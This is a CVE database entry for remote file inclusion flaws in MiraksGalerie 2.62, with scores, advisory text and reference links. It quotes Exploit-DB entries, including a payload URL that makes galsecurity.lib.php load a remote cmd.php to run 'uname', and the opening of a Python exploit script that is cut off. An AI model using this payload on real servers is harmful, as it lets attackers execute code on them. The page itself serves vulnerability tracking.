CVE-2006-2922
published 2006-06-09CVE-2006-2922: Multiple PHP remote file inclusion vulnerabilities in MiraksGalerie 2.62 allow remote attackers to execute arbitrary PHP code via a URL in the (1)…
PriorityP334medium5.1CVSS 2.0
AVNACHAuNCPIPAP
EXPLOIT
EPSS
4.38%
90.1th percentile
Multiple PHP remote file inclusion vulnerabilities in MiraksGalerie 2.62 allow remote attackers to execute arbitrary PHP code via a URL in the (1) g_pcltar_lib_dir parameter in (a) pcltar.lib.php when register_globals is enabled, and (2) listconfigfile[] parameter in (b) galsecurity.lib.php and (c) galimage.lib.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| miraks | miraksgalerie | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
MiraksGalerie 2.62 - 'galsecurity.lib.php?listconfigfile[0]' Remote File Inclusion
exploitdb·2006-06-07
CVE-2006-2922 MiraksGalerie 2.62 - 'galsecurity.lib.php?listconfigfile[0]' Remote File Inclusion
MiraksGalerie 2.62 - 'galsecurity.lib.php?listconfigfile[0]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/18313/info
MiraksGalerie is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit these issues to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
http://www.example.com/[mg_path]/galsecurity.lib.php?listconfigfile[0]=http://example/cmd.php?exec=uname
Exploit-DB
MiraksGalerie 2.62 - 'galimage.lib.php?listconfigfile[0]' Remote File Inclusion
exploitdb·2006-06-07
CVE-2006-2922 MiraksGalerie 2.62 - 'galimage.lib.php?listconfigfile[0]' Remote File Inclusion
MiraksGalerie 2.62 - 'galimage.lib.php?listconfigfile[0]' Remote File Inclusion
---
source: https://www.securityfocus.com/bid/18313/info
MiraksGalerie is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.
An attacker can exploit these issues to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
#!/usr/bin/env python
#
# MiraksGalerie
#
# Federico Fazzi
# more info see advisory.
# need register_global = On
import os, sys, socket
usage = "run: python %s [remote_addr> [remote_port] [remote_path]
[remote_cm
No writeups or analysis indexed.
http://secunia.com/advisories/20475http://securitytracker.com/id?1016249http://www.osvdb.org/26194http://www.osvdb.org/26195http://www.osvdb.org/26196http://www.securityfocus.com/archive/1/436333/100/0/threadedhttp://www.securityfocus.com/bid/18313http://www.vupen.com/english/advisories/2006/2187https://exchange.xforce.ibmcloud.com/vulnerabilities/27010http://secunia.com/advisories/20475http://securitytracker.com/id?1016249http://www.osvdb.org/26194http://www.osvdb.org/26195http://www.osvdb.org/26196http://www.securityfocus.com/archive/1/436333/100/0/threadedhttp://www.securityfocus.com/bid/18313http://www.vupen.com/english/advisories/2006/2187https://exchange.xforce.ibmcloud.com/vulnerabilities/27010
2006-06-09
Published